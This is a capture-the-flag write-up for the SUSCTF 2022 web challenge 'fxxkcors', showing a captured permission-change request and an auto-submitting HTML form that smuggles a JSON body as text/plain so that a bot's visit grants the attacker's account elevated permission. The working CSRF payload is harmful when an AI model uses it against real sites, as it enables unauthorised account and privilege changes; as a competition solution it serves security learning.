SUSCTF 2022 - web/fxxkcors

[aszx87410]

You can login with any username, and then there is a page to change permission: http://124.71.205.122:10002/change.php

The request looks like this, it's in JSON format:

POST /changeapi.php HTTP/1.1
Host: 124.71.205.122:10002
Content-Length: 19
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Content-Type: application/json; charset=UTF-8
Origin: http://124.71.205.122:10002
Referer: http://124.71.205.122:10002/change.php
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=1ab6387f551b235d26d1c88a3685d752
Connection: close

{"username":"huli"}

There is also a bot, you can send it any link so we can do CSRF here via <form> and enctype="text/plain", like this:

<body>
    <form id=a action="http://124.71.205.122:10002/changeapi.php" method="POST" enctype="text/plain">
      <input name='{"username":"fweewfwef", "abc":"' value='123"}'>
    </form>
    <script>
      a.submit()
    </script>
</body>

The form above will send request with body {"username":"fweewfwef", "abc":"=123"}, and content type text/plain. The server did not check the content type so it's fine.

After updating the permission, just visit home.php and get the flag.